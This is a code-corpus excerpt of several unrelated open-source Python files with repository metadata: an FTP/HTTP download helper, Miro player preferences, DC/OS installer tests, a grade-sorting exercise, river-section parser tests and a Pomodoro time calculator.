minzhangcheng/MPL
|
MPL/Network/Download.py
|
1
|
3810
|
# ############################################################################
#
# Copyright (C) 2015 Minzhang Cheng
# Contact: minzhangcheng@gmail.com
#
# This file is part of the Minzhang's Python Library, a Python library with many utils by Minzhang Cheng.
#
# GNU Lesser General Public License Usage
# This file may be used under the terms of the GNU Lesser General Public
# License version 3 as published by the Free Software Foundation and
# appearing in the file LICENSE included in the packaging of this file.
# Please review the following information to ensure the GNU Lesser
# General Public License version 3 requirements will be met:
# http://www.gnu.org/licenses/gpl-3.0.html
#
# ############################################################################
import __future__
import ftplib
import requests
def ftpDownload(url, path, filename='', user='anonymous', password=''):
"""
##############################################################################
#
# ftpDownload(url, URL of ftp, pointing to a file
# path, The path to store downloaded file
# filename='', Filename, default to use the original name from ftp server
# user='anonymous', FTP user, default to use anonymous mode
# password='') FTP password, default to use anonymous mode
#
# Download one file from ftp server, with url like
# [ftp://][user:password]@ftphost[:port]/[path/]filename
#
##############################################################################
"""
url = url.strip(' \t\n')
if url[:6] == 'ftp://':
url = url[6:]
at = url.find('@')
if at >= 0:
(ftpUser, host) = url.rsplit('@', 1)
user = ftpUser
sep = ftpUser.find(':')
if sep >= 0:
(user, password) = ftpUser.split(':', 1)
else:
host = url
(host, ftpPath) = host.split('/', 1)
host = host.split(':')
if len(host) == 2:
port = host[1]
host = host[0]
else:
port = 21
host = host[0]
sep = ftpPath.find('/')
if sep >= 0:
(ftpPath, name) = ftpPath.rsplit('/', 1)
else:
name = ftpPath
ftpPath = ''
if path[-1] != '/':
path += '/'
if filename == '':
filename = path + name
else:
filename = path + filename
ftp = ftplib.FTP()
ftp.connect(host, port)
ftp.login(user, password)
if ftpPath != '':
ftp.cwd(ftpPath)
outFile = open(filename, 'wb')
ftp.retrbinary('RETR %s' % name, outFile.write)
ftp.quit()
outFile.close()
return True
def httpDownload(url, path, filename=''):
"""
Download one file from http server.
httpDownload(url, URL of a file
path, The path to store downloaded file
filename='') Filename, default to use the original name
from http server
"""
if path[-1] not in '/':
path += '/'
if len(filename) == 0:
file = url.rsplit('/', 1)[-1]
file = path + file
else:
file = path + filename
req = requests.get(url)
outFile = open(file, 'wb')
outFile.write(req.content)
outFile.close()
return True
def download(url, path, filename=''):
"""
Download one file from remote server.
download(url, URL of a file
path, The path to store downloaded file
filename='') Filename, default to use the original name from
remote server
"""
if url[:6] == 'ftp://':
return ftpDownload(url, path, filename)
else:
return httpDownload(url, path, filename)
|
lgpl-3.0
| 6,221,154,197,156,404,000
| 30.237705
| 105
| 0.505512
| false
| 4.339408
| false
| false
| false
|
debugger06/MiroX
|
linux/plat/options.py
|
1
|
3688
|
# Miro - an RSS based video player application
# Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011
# Participatory Culture Foundation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
#
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
"""miro.plat.options -- Holds platform-specific command line options.
Most/all of these are set in the miro.real script. The values here are
hopefully sane defaults.
"""
# these have no related prefs
shouldSyncX = False
frontend = 'html'
themeName = None
gconf_name = None
user_home = "~/"
override_dimensions = None
from miro.prefs import Pref
class LinuxPref(Pref):
def __init__(self, key, default, alias, helptext):
Pref.__init__(self, key, default, False, None, None)
self.alias = alias
self.helptext = helptext
FFMPEG_BINARY = LinuxPref(
key="ffmpegBinary",
default="/usr/bin/ffmpeg",
alias="ffmpeg",
helptext="Absolute path for ffmpeg binary.")
FFMPEG2THEORA_BINARY = LinuxPref(
key="ffmpeg2TheoraBinary",
default="/usr/bin/ffmpeg2theora",
alias="ffmpeg2theora",
helptext="Absolute path for ffmpeg2theora binary.")
FIRST_TIME = LinuxPref(
key="startupTasksDone",
default=True,
alias="firsttimestartup",
helptext="If False, Miro shows first time startup dialog.")
USE_RENDERER = LinuxPref(
key="useRenderer",
default=u"gstreamer",
alias="renderer",
helptext="Which renderer to use. (gstreamer, ...)")
GSTREAMER_IMAGESINK = LinuxPref(
key="DefaultGstreamerImagesink",
default="gconfvideosink",
alias="gstreamer-imagesink",
helptext=("Which GStreamer image sink to use for video. "
"(autovideosink, ximagesink, xvimagesink, gconfvideosink, ...)"))
GSTREAMER_AUDIOSINK = LinuxPref(
key="DefaultGstreamerAudiosink",
default="gconfaudiosink",
alias="gstreamer-audiosink",
helptext=("Which GStreamer sink to use for audio. "
"(autoaudiosink, osssink, alsasink, gconfaudiosink, ...)"))
SHOW_TRAYICON = Pref(
key="showTrayicon",
default=True,
platformSpecific=False)
WINDOWS_ICON = Pref(
key='windowsIcon',
default=None,
# this is platform specific, but if we set this to True then it
# won't look up the value in the theme's app.config file
platformSpecific=False)
# build a lookup for preferences by alias
PREFERENCES = {}
for mem in dir():
p = locals()[mem]
if isinstance(p, Pref) and hasattr(p, "alias"):
PREFERENCES[p.alias] = p
|
gpl-2.0
| 1,548,895,991,307,455,500
| 33.46729
| 79
| 0.714208
| false
| 3.666004
| false
| false
| false
|
lingmann/dcos
|
dcos_installer/test_backend.py
|
1
|
12788
|
import json
import os
import subprocess
import uuid
import passlib.hash
import pytest
import gen
import gen.build_deploy.aws
import release
from dcos_installer import backend
from dcos_installer.config import Config, make_default_config_if_needed, to_config
os.environ["BOOTSTRAP_ID"] = "12345"
@pytest.fixture(scope='module')
def config():
if not os.path.exists('dcos-release.config.yaml'):
pytest.skip("Skipping because there is no configuration in dcos-release.config.yaml")
return release.load_config('dcos-release.config.yaml')
@pytest.fixture(scope='module')
def config_testing(config):
if 'testing' not in config:
pytest.skip("Skipped because there is no `testing` configuration in dcos-release.config.yaml")
return config['testing']
@pytest.fixture(scope='module')
def config_aws(config_testing):
if 'aws' not in config_testing:
pytest.skip("Skipped because there is no `testing.aws` configuration in dcos-release.config.yaml")
return config_testing['aws']
def test_password_hash():
"""Tests that the password hashing method creates de-cryptable hash
"""
password = 'DcosTestingPassword!@#'
# only reads from STDOUT
hash_pw = subprocess.check_output(['dcos_installer', '--hash-password', password])
print(hash_pw)
hash_pw = hash_pw.decode('ascii').strip('\n')
assert passlib.hash.sha512_crypt.verify(password, hash_pw), 'Hash does not match password'
def test_set_superuser_password(tmpdir):
"""Test that --set-superuser-hash works"""
with tmpdir.as_cwd():
tmpdir.join('genconf').ensure(dir=True)
# TODO(cmaloney): Add tests for the behavior around a non-existent config.yaml
# Setting in a non-empty config.yaml which has no password set
make_default_config_if_needed('genconf/config.yaml')
assert 'superuser_password_hash' not in Config('genconf/config.yaml').config
# Set the password
create_fake_build_artifacts(tmpdir)
subprocess.check_call(['dcos_installer', '--set-superuser-password', 'foo'], cwd=str(tmpdir))
# Check that config.yaml has the password set
config = Config('genconf/config.yaml')
assert passlib.hash.sha512_crypt.verify('foo', config['superuser_password_hash'])
def test_generate_node_upgrade_script(tmpdir, monkeypatch):
upgrade_config = """
---
# The name of your DC/OS cluster. Visable in the DC/OS user interface.
cluster_name: 'DC/OS'
master_discovery: static
exhibitor_storage_backend: 'static'
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
process_timeout: 10000
bootstrap_url: file:///opt/dcos_install_tmp
master_list: ['10.0.0.1', '10.0.0.2', '10.0.0.5']
"""
monkeypatch.setenv('BOOTSTRAP_VARIANT', '')
create_config(upgrade_config, tmpdir)
create_fake_build_artifacts(tmpdir)
output = subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script', 'fake'], cwd=str(tmpdir))
assert output.decode('utf-8').splitlines()[-1].split("Node upgrade script URL: ", 1)[1]\
.endswith("dcos_node_upgrade.sh")
try:
subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script'], cwd=str(tmpdir))
except subprocess.CalledProcessError as e:
print(e.output)
assert e.output.decode('ascii') == "Must provide the version of the cluster upgrading from\n"
else:
raise Exception("Test passed, this should not pass without specifying a version number")
def test_version(monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'some-variant')
version_data = subprocess.check_output(['dcos_installer', '--version']).decode()
assert json.loads(version_data) == {
'version': '1.10.0-beta2',
'variant': 'some-variant'
}
def test_good_create_config_from_post(tmpdir):
"""
Test that it creates the config
"""
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
temp_ip_detect_path = workspace + '/ip-detect'
f = open(temp_ip_detect_path, "w")
f.write("#/bin/bash foo")
good_post_data = {
"agent_list": ["10.0.0.2"],
"master_list": ["10.0.0.1"],
"cluster_name": "Good Test",
"resolvers": ["4.4.4.4"],
"ip_detect_filename": temp_ip_detect_path
}
expected_good_messages = {}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=good_post_data,
config_path=temp_config_path)
assert messages == expected_good_messages
def test_bad_create_config_from_post(tmpdir):
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
bad_post_data = {
"agent_list": "foo",
"master_list": ["foo"],
}
expected_bad_messages = {
"agent_list": "Must be a JSON formatted list, but couldn't be parsed the given value `foo` as "
"one because of: Expecting value: line 1 column 1 (char 0)",
"master_list": 'Invalid IPv4 addresses in list: foo',
}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=bad_post_data,
config_path=temp_config_path)
assert messages == expected_bad_messages
def test_do_validate_config(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
# Create a temp config
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
temp_config_path = str(genconf_dir.join('config.yaml'))
# Initialize with defautls
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
expected_output = {
'ip_detect_contents': 'ip-detect script `genconf/ip-detect` must exist',
'ssh_user': 'Must set ssh_user, no way to calculate value.',
'master_list': 'Must set master_list, no way to calculate value.',
'ssh_key_path': 'could not find ssh private key: genconf/ssh_key'
}
with tmpdir.as_cwd():
assert Config(config_path='genconf/config.yaml').do_validate(include_ssh=True) == expected_output
def test_get_config(tmpdir):
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
expected_data = {
'cluster_name': 'DC/OS',
'master_discovery': 'static',
'exhibitor_storage_backend': 'static',
'resolvers': ['8.8.8.8', '8.8.4.4'],
'ssh_port': 22,
'process_timeout': 10000,
'bootstrap_url': 'file:///opt/dcos_install_tmp'
}
make_default_config_if_needed(temp_config_path)
config = Config(temp_config_path)
assert expected_data == config.config
def test_determine_config_type(tmpdir):
# Ensure the default created config is of simple type
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
got_output = backend.determine_config_type(config_path=temp_config_path)
expected_output = {
'message': '',
'type': 'minimal',
}
assert got_output == expected_output
def test_success():
mock_config = to_config({
'master_list': ['10.0.0.1', '10.0.0.2', '10.0.0.5'],
'agent_list': ['10.0.0.3', '10.0.0.4']
})
expected_output = {
"success": "http://10.0.0.1",
"master_count": 3,
"agent_count": 2
}
expected_output_bad = {
"success": "",
"master_count": 0,
"agent_count": 0
}
got_output, code = backend.success(mock_config)
mock_config.update({'master_list': '', 'agent_list': ''})
bad_out, bad_code = backend.success(mock_config)
assert got_output == expected_output
assert code == 200
assert bad_out == expected_output_bad
assert bad_code == 400
def test_accept_overrides_for_undefined_config_params(tmpdir):
temp_config_path = tmpdir.strpath + '/config.yaml'
param = ('fake_test_param_name', 'fake_test_param_value')
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=dict([param]),
config_path=temp_config_path)
assert not messages, "unexpected validation error: {}".format(messages)
assert Config(config_path=temp_config_path)[param[0]] == param[1]
simple_full_config = """---
cluster_name: DC/OS
master_discovery: static
exhibitor_storage_backend: static
master_list:
- 127.0.0.1
bootstrap_url: http://example.com
"""
def test_do_configure(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(simple_full_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_configure(config_path='genconf/config.yaml') == 0
aws_base_config = """---
# NOTE: Taking advantage of what isn't talked about not being validated so we don't need valid AWS /
# s3 credentials in this configuration.
aws_template_storage_bucket: psychic
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_region_name: us-west-2
aws_template_upload: false
"""
def test_do_aws_configure(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(aws_base_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_aws_cf_configure() == 0
valid_storage_config = """---
master_list:
- 127.0.0.1
aws_template_storage_access_key_id: {key_id}
aws_template_storage_bucket: {bucket}
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_secret_access_key: {access_key}
aws_template_upload: true
"""
def test_do_aws_cf_configure_valid_storage_config(config_aws, tmpdir, monkeypatch):
bucket = str(uuid.uuid4())
config_str = valid_storage_config.format(
key_id=config_aws["access_key_id"],
bucket=bucket,
access_key=config_aws["secret_access_key"])
assert aws_cf_configure(bucket, config_str, config_aws, tmpdir, monkeypatch) == 0
# TODO: add an assertion that the config that was resolved inside do_aws_cf_configure
# ended up with the correct region where the above testing bucket was created.
def test_override_aws_template_storage_region_name(config_aws, tmpdir, monkeypatch):
bucket = str(uuid.uuid4())
config_str = valid_storage_config.format(
key_id=config_aws["access_key_id"],
bucket=bucket,
access_key=config_aws["secret_access_key"])
config_str += '\naws_template_storage_region_name: {}'.format(config_aws['region_name'])
assert aws_cf_configure(bucket, config_str, config_aws, tmpdir, monkeypatch) == 0
def aws_cf_configure(s3_bucket_name, config, config_aws, tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
session = gen.build_deploy.aws.get_test_session(config_aws)
s3 = session.resource('s3')
s3_bucket = s3.Bucket(s3_bucket_name)
s3_bucket.create(CreateBucketConfiguration={'LocationConstraint': config_aws['region_name']})
create_config(config, tmpdir)
create_fake_build_artifacts(tmpdir)
try:
with tmpdir.as_cwd():
return backend.do_aws_cf_configure()
finally:
objects = [{'Key': o.key} for o in s3_bucket.objects.all()]
s3_bucket.delete_objects(Delete={'Objects': objects})
s3_bucket.delete()
def create_config(config_str, tmpdir):
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
config_path = genconf_dir.join('config.yaml')
config_path.write(config_str)
genconf_dir.join('ip-detect').write('#!/bin/bash\necho 127.0.0.1')
def create_fake_build_artifacts(tmpdir):
artifact_dir = tmpdir.join('artifacts/bootstrap')
artifact_dir.ensure(dir=True)
artifact_dir.join('12345.bootstrap.tar.xz').write('contents_of_bootstrap', ensure=True)
artifact_dir.join('12345.active.json').write('["package--version"]', ensure=True)
artifact_dir.join('test_variant.bootstrap.latest').write("12345")
tmpdir.join('artifacts/complete/test_variant.complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/complete/complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/packages/package/package--version.tar.xz').write('contents_of_package', ensure=True)
|
apache-2.0
| -2,982,937,157,660,341,000
| 33.562162
| 115
| 0.665077
| false
| 3.474056
| true
| false
| false
|
adrianbeloqui/Python
|
nested_lists.py
|
1
|
1675
|
"""Given the names and grades for each student in a Physics class of N
students, store them in a nested list and print the name(s) of any
student(s) having the second lowest grade.
Note: If there are multiple students with the same grade, order their
names alphabetically and print each name on a new line.
Input Format
The first line contains an integer, N, the number of students.
The subsequent lines describe each student over 2N lines; the first
line contains a student's name, and the second line contains their
grade.
Constraints
2 <= N <= 5
There will always be one or more students having the second lowest
grade.
Output Format
Print the name(s) of any student(s) having the second lowest grade
in Physics; if there are multiple students, order their names
alphabetically and print each one on a new line.
"""
from operator import itemgetter
def second_lowest(*args):
arr = args[0]
lowest, higher_lowest = arr[0], ["", 100]
for student in arr:
if student[1] < higher_lowest[1]:
if student[1] < lowest[1]:
higher_lowest, lowest = lowest, student
elif student[1] == lowest[1]:
continue
else:
higher_lowest = student
return higher_lowest[1]
if __name__ == '__main__':
students = []
for _ in range(int(input())):
name = input()
score = float(input())
students.append([name, score])
second_largest_grade = second_lowest(students)
result_list = list(filter(lambda x: x[1] == second_largest_grade, students))
result_list.sort(key=itemgetter(0))
for student in result_list:
print(student[0])
|
mit
| -7,068,788,371,389,833,000
| 29.472727
| 80
| 0.666269
| false
| 3.86836
| false
| false
| false
|
duncan-r/SHIP
|
tests/test_riverunit.py
|
1
|
13279
|
from __future__ import unicode_literals
import unittest
from ship.fmp.datunits import riverunit
from ship.fmp.datunits import ROW_DATA_TYPES as rdt
from ship.datastructures.rowdatacollection import RowDataCollection
from ship.datastructures import dataobject as do
from ship.fmp.fmpunitfactory import FmpUnitFactory
class RiverUnitTests(unittest.TestCase):
'''Tests for all of the methods in the river class.
The complications involved in writing these tests show that there is probably some
serious factoring needed in the RiverUnit class.
Perhaps breaking down the readData() method in to smaller chunks would be a good
start. Then looking at a similar approach to the setupUnit() method.
'''
def setUp(self):
'''Sets up everyting that is needed in multiple tests to save too
much mucking about.
'''
# Example list as read from the dat file on the readFile() method in FileTools.py
self.input_contents = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT\n',
'SECTION\n',
'1.069 Spill1 Spill2 Lat1\n',
' 15.078 1.111111 1000\n',
' 18\n',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 \n',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 \n',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 \n',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 \n',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 \n',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 \n',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 \n',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 \n',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 \n',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 \n',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 \n',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 \n',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 \n',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 \n',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 \n',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 \n',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 \n',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 \n']
# List as exported from the setupUnit() method
self.unit_data_test = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT',
'SECTION',
'1.069',
' 15.078 1.111111 1000',
' 18',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 ',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 ',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 ',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 ',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 ',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 ',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 ',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 ',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 ',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 ',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 ',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 ',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 ',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 ',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 ',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 ',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 ',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 ']
# Lists for each of the data objects that are created when reading the file
self.bankmarker = ['LEFT', '', '', '', '', 'BED', '', '', '', '', '', '', '', '', '', '', '', 'RIGHT']
self.chainage = [5.996, 6.936, 7.446, 7.635, 8.561, 9.551, 10.323, 10.904,
12.542, 13.74, 13.788, 13.944, 15.008, 16.355, 17.424, 18.449, 19.416, 19.420]
self.deactivation = ['LEFT', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'RIGHT']
self.easting = [291391.67, 291391.43, 291391.3, 291391.25, 291391.01, 291390.75, 291390.55, 291390.4,
291389.98, 291389.67, 291389.66, 291389.62, 291389.34, 291389.0, 291388.72, 291388.46, 291388.21, 291388.21]
self.elevation = [37.56, 37.197, 36.726, 35.235, 35.196, 35.19, 35.229, 35.319,
35.637, 35.593, 35.592, 36.148, 36.559, 37.542, 38.518, 39.037, 39.146, 39.133]
self.northing = [86582.61, 86581.7, 86581.21, 86581.03, 86580.13, 86579.18, 86578.43, 86577.87,
86576.29, 86575.13, 86575.09, 86574.93, 86573.91, 86572.6, 86571.57, 86570.58, 86569.65, 86569.65]
self.panelmarker = [False, True, False, False, False, False, False, False,
False, False, False, False, True, False, False, False, False, False]
self.roughness = [0.08, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.035, 0.08, 0.08, 0.08, 0.08, 0.08, 0.08]
self.rpl = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
self.special = ['16', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '4095']
def test_readHeadData(self):
'''Checks that the readHeadData() method works individually from the
factory load in the test_river_object_vars_from_load() test.
This should help to narrow down the problem if tests fail.
'''
# create a unloaded river unit to just check the readHeadData() method.
r = riverunit.RiverUnit()
# Put the test data into the method
r._readHeadData(self.unit_data_test, 0)
self.assertEqual(r._name, '1.069')
self.assertEqual(r._name_ds, 'unknown')
self.assertEqual(r.head_data['comment'].value, '(Culvert Exit) CH:7932 - Trimmed to BT')
self.assertEqual(r.head_data['distance'].value, 15.078)
self.assertEqual(r.head_data['slope'].value, 1.111111)
self.assertEqual(r.head_data['density'].value, 1000)
def test_readRowData(self):
'''Checks that the readRowData() method works individually from the
factory load in the test_river_object_vars_from_load() test.
This should help to narrow down the problem if tests fail.
'''
# create a unloaded river unit to just check the readHeadData() method.
river = riverunit.RiverUnit()
# Put the test data into the readrowData() method
river.readUnitData(self.unit_data_test, 0)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.CHAINAGE), self.chainage)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.ELEVATION), self.elevation)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.ROUGHNESS), self.roughness)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.PANEL_MARKER), self.panelmarker)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.RPL), self.rpl)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.BANKMARKER), self.bankmarker)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.EASTING), self.easting)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.NORTHING), self.northing)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.DEACTIVATION), self.deactivation)
self.assertListEqual(river.row_data['main'].dataObjectAsList(rdt.SPECIAL), self.special)
self.assertEqual(river.unit_category, 'river')
self.assertEqual(river.unit_type, 'river')
def test_getData(self):
'''Test to check the suitability of the getData() method.
'''
# Create a factory and load the river unit
ifactory = FmpUnitFactory()
i, river = ifactory.createUnitFromFile(self.input_contents, 0, 'RIVER', 1, 1)
# Setup the list that we expect to be returned from the getData() method
out_data = \
['RIVER (Culvert Exit) CH:7932 - Trimmed to BT',
'SECTION',
'1.069 Spill1 Spill2 Lat1',
' 15.078 1.1111 1000.00',
' 18',
' 5.996 37.560 0.080 1.000LEFT 291391.67 86582.61LEFT 16 ',
' 6.936 37.197 0.035* 1.000 291391.43 86581.70 ',
' 7.446 36.726 0.035 1.000 291391.30 86581.21 ',
' 7.635 35.235 0.035 1.000 291391.25 86581.03 ',
' 8.561 35.196 0.035 1.000 291391.01 86580.13 ',
' 9.551 35.190 0.035 1.000BED 291390.75 86579.18 ',
' 10.323 35.229 0.035 1.000 291390.55 86578.43 ',
' 10.904 35.319 0.035 1.000 291390.40 86577.87 ',
' 12.542 35.637 0.035 1.000 291389.98 86576.29 ',
' 13.740 35.593 0.035 1.000 291389.67 86575.13 ',
' 13.788 35.592 0.035 1.000 291389.66 86575.09 ',
' 13.944 36.148 0.035 1.000 291389.62 86574.93 ',
' 15.008 36.559 0.080* 1.000 291389.34 86573.91 ',
' 16.355 37.542 0.080 1.000 291389.00 86572.60 ',
' 17.424 38.518 0.080 1.000 291388.72 86571.57 ',
' 18.449 39.037 0.080 1.000 291388.46 86570.58 ',
' 19.416 39.146 0.080 1.000 291388.21 86569.65 ',
' 19.420 39.133 0.080 1.000RIGHT 291388.21 86569.65RIGHT 4095 ']
# Get the data and check it against our template
data = river.getData()
self.assertEquals(out_data, data, 'getData() formatting failed')
def test_addDataRow(self):
"""Test adding a new row to 'main' data."""
# Create a factory and load the river unit
ifactory = FmpUnitFactory()
i, river = ifactory.createUnitFromFile(self.input_contents, 0, 'RIVER', 1, 1)
# Add with required only args
args = {rdt.CHAINAGE: 6.0, rdt.ELEVATION: 37.2}
river.addRow(args, index=1)
row = river.row_data['main'].rowAsList(1)
testrow = [6.0, 37.2, 0.039, False, 1.0, '', 0.0, 0.0, '', '~']
self.assertListEqual(testrow, row)
# Add with all args
args = {rdt.CHAINAGE: 6.1, rdt.ELEVATION: 37.4, rdt.ROUGHNESS: 0.06,
rdt.PANEL_MARKER: True, rdt.RPL: 1.1, rdt.BANKMARKER: 'BED',
rdt.EASTING: 22.5, rdt.NORTHING: 32.5, rdt.DEACTIVATION: 'RIGHT',
rdt.SPECIAL: '16'}
river.addRow(args, index=2)
row = river.row_data['main'].rowAsList(2)
testrow = [6.1, 37.4, 0.06, True, 1.1, 'BED', 22.5, 32.5, 'RIGHT', '16']
self.assertListEqual(testrow, row)
# Check it fails without required args
args = {rdt.CHAINAGE: 6.2}
with self.assertRaises(AttributeError):
river.addRow(args, index=3)
args = {rdt.ELEVATION: 36.2}
with self.assertRaises(AttributeError):
river.addRow(args, index=3)
# Check we catch non increasing chainage
args = {rdt.CHAINAGE: 5.0, rdt.ELEVATION: 37.2}
with self.assertRaises(ValueError):
river.addRow(args, index=3)
|
mit
| -1,056,165,014,091,718,900
| 63.461165
| 144
| 0.498607
| false
| 3.155656
| true
| false
| false
|
Matt-Deacalion/Pomodoro-Calculator
|
pomodoro_calculator/__init__.py
|
1
|
6013
|
"""
A pretty command line tool to calculate the number
of Pomodori available between two points in time.
"""
__author__ = 'Matt Deacalion Stevens'
__version__ = '1.0.2'
import datetime
from itertools import cycle
class PomodoroCalculator:
"""
Calculates the number of Pomodori available in an amount of time.
"""
def __init__(self, end, start='now', short_break=5, long_break=15,
pomodoro_length=25, group_length=4, interval=False, amount=False):
self.pomodoro_length_seconds = pomodoro_length * 60
self.amount_mode = False
if start == 'now':
self.start = datetime.datetime.now()
else:
self.start = self._create_datetime(start)
if interval:
self.end = self.start + self._create_timedelta(end)
elif amount:
# set dummy end. So we don't crash.
self.end = self.start + self._create_timedelta("48:00:00")
self.amount_mode = True
self.amount = int(end)
else:
self.end = self._create_datetime(end)
# if the end time is earlier than the start,
# overlap to the next day
if self.end.time() < self.start.time():
self.end += datetime.timedelta(days=1)
self.group_length = group_length
self.short_break = short_break
self.long_break = long_break
@property
def short_break_seconds(self):
"""
Returns `short_break` in seconds.
"""
return self.short_break * 60
@property
def long_break_seconds(self):
"""
Returns `long_break` in seconds.
"""
return self.long_break * 60
@property
def total_seconds(self):
"""
Return the total time span in seconds.
"""
delta = self.end - self.start
return int(delta.total_seconds())
def _create_timedelta(self, time_string):
"""
Takes a string in the format of 'HH:MM:SS' and returns a timedelta.
"""
args = dict(zip(
['hours', 'minutes', 'seconds'],
[int(unit) for unit in time_string.split(':')],
))
return datetime.timedelta(**args)
def _create_datetime(self, time_string):
"""
Takes a string in the format of 'HH:MM:SS' and returns a datetime.
"""
args = dict(zip(
['hour', 'minute', 'second'],
[int(unit) for unit in time_string.split(':')],
))
return datetime.datetime.now().replace(**args)
def _get_item(self, offset, item_type, index):
"""
Returns one of three types of Pomodori entities. A short break, a long
break or the Pomodoro itself. The returned dict also contains the
start and end datetimes.
"""
types = {
'short-break': self.short_break_seconds,
'long-break': self.long_break_seconds,
'pomodoro': self.pomodoro_length_seconds,
}
start = self.end - datetime.timedelta(seconds=offset)
end = start + datetime.timedelta(seconds=types[item_type])
return {
'index': index,
'pomodori-index': index // 2 + 1,
'type': item_type,
'start': start,
'end': end,
'length': int((end - start).total_seconds()),
}
